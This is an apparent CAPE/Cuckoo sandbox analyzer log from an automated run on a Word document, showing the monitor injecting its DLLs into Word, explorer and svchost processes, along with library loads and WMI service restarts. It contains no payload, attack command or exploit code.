Analysis

| Category | Package | Started | Completed | Duration |
|---|---|---|---|---|
| FILE | doc | 2019-10-10 00:11:15 | 2019-10-10 00:15:06 | 231 seconds |
  • Info: Behavioral log 1200.bson too big to be processed, skipped. Increase analysis_size_limit in cuckoo.conf
2019-10-10 01:11:15,000 [root] INFO: Date set to: 10-10-19, time set to: 00:11:15, timeout set to: 200
2019-10-10 01:11:15,000 [root] DEBUG: Starting analyzer from: C:\awvqohb
2019-10-10 01:11:15,000 [root] DEBUG: Storing results at: C:\yfIMibnsZc
2019-10-10 01:11:15,000 [root] DEBUG: Pipe server name: \\.\PIPE\AXWCoGty
2019-10-10 01:11:15,000 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-10 01:11:15,000 [root] INFO: Automatically selected analysis package "doc"
2019-10-10 01:11:15,467 [root] DEBUG: Started auxiliary module Browser
2019-10-10 01:11:15,467 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 01:11:15,467 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 01:11:16,170 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2019-10-10 01:11:16,170 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Human
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 01:11:16,184 [root] DEBUG: Started auxiliary module Usage
2019-10-10 01:11:16,184 [root] INFO: Analyzer: Package modules.packages.doc does not specify a DLL option
2019-10-10 01:11:16,184 [root] INFO: Analyzer: Package modules.packages.doc does not specify a DLL_64 option
2019-10-10 01:11:16,450 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc" /q" with pid 1224
2019-10-10 01:11:16,450 [lib.api.process] INFO: 32-bit DLL to inject is C:\awvqohb\dll\JAenYpEs.dll, loader C:\awvqohb\bin\RHhipCm.exe
2019-10-10 01:11:16,466 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:16,466 [root] DEBUG: Loader: Injecting process 1224 (thread 1964) with C:\awvqohb\dll\JAenYpEs.dll.
2019-10-10 01:11:16,466 [root] DEBUG: Process image base: 0x2F9A0000
2019-10-10 01:11:16,466 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\JAenYpEs.dll.
2019-10-10 01:11:16,466 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2FAFD000 - 0x77110000
2019-10-10 01:11:16,466 [root] DEBUG: InjectDllViaIAT: Allocated 0x178 bytes for new import table at 0x2FB00000.
2019-10-10 01:11:16,466 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:11:16,466 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\JAenYpEs.dll.
2019-10-10 01:11:16,466 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1224
2019-10-10 01:11:18,477 [lib.api.process] INFO: Successfully resumed process with pid 1224
2019-10-10 01:11:18,477 [root] INFO: Added new process to list with pid: 1224
2019-10-10 01:11:18,493 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:18,555 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:18,555 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:11:18,555 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:18,555 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:18,555 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:18,555 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1224 at 0x747e0000, image base 0x2f9a0000, stack from 0x345000-0x350000
2019-10-10 01:11:18,555 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc" \q.
2019-10-10 01:11:18,555 [root] INFO: Monitor successfully loaded in process with pid 1224.
2019-10-10 01:11:18,572 [root] DEBUG: DLL loaded at 0x748A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\Comctl32 (0x84000 bytes).
2019-10-10 01:11:18,711 [root] DEBUG: DLL loaded at 0x72770000: C:\Program Files (x86)\Microsoft Office\Office14\wwlib (0x127b000 bytes).
2019-10-10 01:11:18,711 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 01:11:18,743 [root] DEBUG: DLL loaded at 0x74390000: C:\Program Files (x86)\Microsoft Office\Office14\gfx (0x1ab000 bytes).
2019-10-10 01:11:18,743 [root] DEBUG: DLL loaded at 0x749C0000: C:\Windows\system32\WTSAPI32 (0xd000 bytes).
2019-10-10 01:11:18,759 [root] DEBUG: DLL loaded at 0x749B0000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2019-10-10 01:11:18,805 [root] DEBUG: DLL loaded at 0x713D0000: C:\Program Files (x86)\Microsoft Office\Office14\oart (0x1392000 bytes).
2019-10-10 01:11:18,977 [root] DEBUG: DLL loaded at 0x701E0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso (0x11e4000 bytes).
2019-10-10 01:11:19,009 [root] DEBUG: DLL loaded at 0x74150000: C:\Windows\system32\msi (0x240000 bytes).
2019-10-10 01:11:19,039 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:11:19,430 [root] DEBUG: DLL loaded at 0x73FB0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-10-10 01:11:19,460 [root] DEBUG: DLL loaded at 0x73BA0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf (0x40f000 bytes).
2019-10-10 01:11:19,539 [root] DEBUG: DLL loaded at 0x73AD0000: C:\Program Files (x86)\Microsoft Office\Office14\1033\wwintl (0xc9000 bytes).
2019-10-10 01:11:19,664 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:11:19,694 [root] DEBUG: DLL loaded at 0x70120000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS (0xbc000 bytes).
2019-10-10 01:11:19,757 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-10-10 01:11:19,867 [root] DEBUG: DLL loaded at 0x6FFD0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20 (0x14f000 bytes).
2019-10-10 01:11:19,881 [root] DEBUG: DLL loaded at 0x6BAA0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES (0x452a000 bytes).
2019-10-10 01:11:19,898 [root] DEBUG: DLL loaded at 0x6B830000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL (0x262000 bytes).
2019-10-10 01:11:19,914 [root] INFO: Announced 32-bit process name:  pid: 80280815
2019-10-10 01:11:19,914 [lib.api.process] WARNING: The process with pid 80280815 is not alive, injection aborted
2019-10-10 01:11:19,914 [root] DEBUG: DLL loaded at 0x6B7E0000: C:\Windows\system32\mscoree (0x4a000 bytes).
2019-10-10 01:11:19,914 [root] DEBUG: set_caller_info: Adding region at 0x00560000 to caller regions list (kernel32::FindFirstFileExW).
2019-10-10 01:11:19,914 [root] DEBUG: set_caller_info: Adding region at 0x01E50000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:11:19,928 [root] DEBUG: DLL loaded at 0x6B760000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-10-10 01:11:20,069 [root] DEBUG: DLL loaded at 0x6B740000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC (0x20000 bytes).
2019-10-10 01:11:20,194 [root] DEBUG: DLL loaded at 0x6B720000: C:\Windows\system32\DwmApi (0x13000 bytes).
2019-10-10 01:11:20,319 [root] DEBUG: DLL loaded at 0x6B6C0000: C:\Windows\system32\Winspool.DRV (0x51000 bytes).
2019-10-10 01:11:20,381 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-10-10 01:11:20,413 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:11:20,413 [root] DEBUG: DLL loaded at 0x6B690000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:11:20,444 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:11:20,444 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:11:20,444 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:11:20,460 [root] DEBUG: DLL unloaded from 0x6B690000.
2019-10-10 01:11:20,615 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-10-10 01:11:20,615 [root] DEBUG: DLL unloaded from 0x2F9A0000.
2019-10-10 01:11:20,647 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:11:20,647 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:11:20,647 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:11:20,661 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:11:20,661 [root] DEBUG: DLL loaded at 0x6B5C0000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-10-10 01:11:20,661 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 01:11:20,677 [root] DEBUG: DLL loaded at 0x749D0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-10-10 01:11:20,677 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:11:20,772 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-10-10 01:11:20,772 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:11:20,772 [root] DEBUG: DLL loaded at 0x6B5B0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-10-10 01:11:20,865 [root] DEBUG: DLL loaded at 0x6B450000: C:\Windows\System32\msxml6 (0x158000 bytes).
2019-10-10 01:11:21,020 [root] DEBUG: DLL loaded at 0x6B440000: C:\Windows\system32\profapi (0xb000 bytes).
2019-10-10 01:11:21,286 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-10-10 01:11:21,318 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-10-10 01:11:21,318 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-10-10 01:11:21,332 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-10-10 01:11:21,332 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-10-10 01:11:21,457 [root] DEBUG: DLL loaded at 0x6B200000: C:\Program Files (x86)\Microsoft Office\Office14\GKWord (0x238000 bytes).
2019-10-10 01:11:21,505 [root] DEBUG: DLL unloaded from 0x6B200000.
2019-10-10 01:11:21,598 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 3012
2019-10-10 01:11:21,598 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:21,614 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:21,614 [root] DEBUG: Loader: Injecting process 3012 (thread 1928) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,614 [root] DEBUG: Process image base: 0x00000000FF8B0000
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF8C4000 - 0x000007FEFF430000
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x00000000FF8D0000.
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:11:21,614 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,614 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3012
2019-10-10 01:11:21,614 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 3012
2019-10-10 01:11:21,614 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:21,614 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:21,614 [root] DEBUG: Loader: Injecting process 3012 (thread 1928) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,614 [root] DEBUG: Process image base: 0x00000000FF8B0000
2019-10-10 01:11:21,614 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,630 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:11:21,630 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:21,630 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3012
2019-10-10 01:11:21,661 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:21,661 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:21,691 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:21,691 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:22,658 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:11:22,658 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3012 at 0x000000006B360000, image base 0x00000000FF8B0000, stack from 0x0000000000135000-0x0000000000140000
2019-10-10 01:11:22,658 [root] DEBUG: Commandline: C:\Windows\splwow64.exe 12288.
2019-10-10 01:11:22,658 [root] INFO: Added new process to list with pid: 3012
2019-10-10 01:11:22,658 [root] INFO: Monitor successfully loaded in process with pid 3012.
2019-10-10 01:11:23,673 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 01:11:23,673 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-10-10 01:11:23,937 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\cryptsp (0x17000 bytes).
2019-10-10 01:11:23,953 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2019-10-10 01:11:23,970 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2019-10-10 01:11:23,970 [root] DEBUG: DLL unloaded from 0x6B6C0000.
2019-10-10 01:11:24,016 [root] DEBUG: DLL loaded at 0x000007FEF2ED0000: C:\Windows\system32\spool\DRIVERS\x64\3\unidrvui (0xdc000 bytes).
2019-10-10 01:11:24,032 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 01:11:24,048 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-10-10 01:11:24,141 [root] DEBUG: DLL loaded at 0x000007FEF9880000: C:\Windows\system32\spool\DRIVERS\x64\3\SendToOneNoteUI (0x12000 bytes).
2019-10-10 01:11:24,157 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,157 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,171 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,187 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,234 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,234 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,250 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,266 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,282 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,312 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,328 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,344 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,359 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,359 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,375 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,405 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,405 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,421 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,437 [root] DEBUG: DLL loaded at 0x000007FEF2E10000: C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv (0xb2000 bytes).
2019-10-10 01:11:24,469 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,516 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\system32\FontSub (0x1c000 bytes).
2019-10-10 01:11:24,562 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,562 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,562 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,578 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,578 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:11:24,594 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,594 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,625 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:11:24,625 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:11:24,937 [root] DEBUG: DLL loaded at 0x6B2C0000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10 (0x9e000 bytes).
2019-10-10 01:11:25,092 [root] DEBUG: DLL loaded at 0x6B190000: C:\Windows\SysWOW64\FM20 (0x12c000 bytes).
2019-10-10 01:11:25,092 [root] DEBUG: DLL loaded at 0x750B0000: C:\Windows\syswow64\COMDLG32 (0x7b000 bytes).
2019-10-10 01:11:25,124 [root] DEBUG: set_caller_info: Adding region at 0x00250000 to caller regions list (ntdll::LdrLoadDll).
2019-10-10 01:11:25,388 [root] DEBUG: DLL loaded at 0x6B130000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-10-10 01:11:25,436 [root] DEBUG: DLL loaded at 0x6AEA0000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7 (0x28d000 bytes).
2019-10-10 01:11:25,467 [root] DEBUG: DLL loaded at 0x65300000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL (0x26000 bytes).
2019-10-10 01:11:25,467 [root] DEBUG: set_caller_info: Adding region at 0x07C70000 to caller regions list (ntdll::memcpy).
2019-10-10 01:11:25,497 [root] DEBUG: DLL loaded at 0x6AE70000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-10-10 01:11:25,497 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2019-10-10 01:11:25,497 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:25,497 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:25,497 [root] DEBUG: Loader: Injecting process 1632 (thread 0) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:25,497 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 01:11:25,513 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:25,513 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:25,513 [root] DEBUG: set_caller_info: Adding region at 0x07C80000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:11:25,513 [root] DEBUG: set_caller_info: Adding region at 0x00120000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:11:25,513 [root] DEBUG: set_caller_info: Adding region at 0x054F0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:11:25,529 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:25,529 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:25,545 [root] DEBUG: set_caller_info: Adding region at 0x00010000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:11:25,545 [root] DEBUG: set_caller_info: Adding region at 0x006F0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:11:25,545 [root] DEBUG: set_caller_info: Adding region at 0x00350000 to caller regions list (advapi32::RegCloseKey).
2019-10-10 01:11:25,592 [root] DEBUG: set_caller_info: Adding region at 0x07920000 to caller regions list (kernel32::GetLocalTime).
2019-10-10 01:11:25,592 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1632 at 0x000000006B360000, image base 0x00000000FF900000, stack from 0x0000000006A32000-0x0000000006A40000
2019-10-10 01:11:25,592 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-10-10 01:11:25,592 [root] INFO: Added new process to list with pid: 1632
2019-10-10 01:11:25,592 [root] INFO: Monitor successfully loaded in process with pid 1632.
2019-10-10 01:11:25,592 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:11:25,592 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:11:25,592 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:26,263 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6060000 to caller regions list (advapi32::RegNotifyChangeKeyValue).
2019-10-10 01:11:26,309 [root] DEBUG: set_caller_info: Adding region at 0x009C0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:11:26,355 [root] DEBUG: DLL loaded at 0x6AE60000: C:\Windows\SysWOW64\fm20ENU (0x8000 bytes).
2019-10-10 01:11:26,418 [root] DEBUG: set_caller_info: Adding region at 0x03880000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:11:26,792 [root] DEBUG: DLL loaded at 0x6AE20000: C:\Windows\system32\wbem\wbemdisp (0x31000 bytes).
2019-10-10 01:11:26,823 [root] DEBUG: DLL loaded at 0x6ADC0000: C:\Windows\system32\wbemcomn (0x5c000 bytes).
2019-10-10 01:11:26,839 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2019-10-10 01:11:26,839 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-10-10 01:11:27,012 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4AD0000 to caller regions list (advapi32::RegNotifyChangeKeyValue).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4AF0000 to caller regions list (advapi32::OpenSCManagerW).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:27,042 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtWaitForSingleObject).
2019-10-10 01:11:34,608 [root] INFO: Stopped WMI Service
2019-10-10 01:11:34,608 [root] INFO: Attaching to DcomLaunch service (pid 564)
2019-10-10 01:11:34,608 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:34,624 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:34,624 [root] DEBUG: Loader: Injecting process 564 (thread 0) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:34,624 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 568, handle 0x84
2019-10-10 01:11:34,624 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 01:11:34,624 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 01:11:34,624 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 01:11:34,624 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:34,624 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:34,624 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:34,624 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:34,624 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 564 at 0x000000006B360000, image base 0x00000000FFA10000, stack from 0x0000000002286000-0x0000000002290000
2019-10-10 01:11:34,624 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k DcomLaunch.
2019-10-10 01:11:34,624 [root] INFO: Added new process to list with pid: 564
2019-10-10 01:11:34,624 [root] INFO: Monitor successfully loaded in process with pid 564.
2019-10-10 01:11:34,624 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:11:34,624 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:11:34,640 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:38,726 [root] INFO: Started WMI Service
2019-10-10 01:11:38,726 [root] INFO: Attaching to WMI service (pid 1200)
2019-10-10 01:11:38,726 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:38,743 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:38,743 [root] DEBUG: Loader: Injecting process 1200 (thread 0) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:38,743 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 01:11:38,743 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:38,743 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:38,743 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:38,743 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:38,743 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1200 at 0x000000006B360000, image base 0x00000000FFA10000, stack from 0x0000000001366000-0x0000000001370000
2019-10-10 01:11:38,757 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2019-10-10 01:11:38,757 [root] INFO: Added new process to list with pid: 1200
2019-10-10 01:11:38,757 [root] INFO: Monitor successfully loaded in process with pid 1200.
2019-10-10 01:11:38,757 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:11:38,757 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:11:38,757 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:40,802 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:11:40,818 [root] DEBUG: DLL loaded at 0x73AA0000: C:\Windows\system32\wbem\wbemprox (0xa000 bytes).
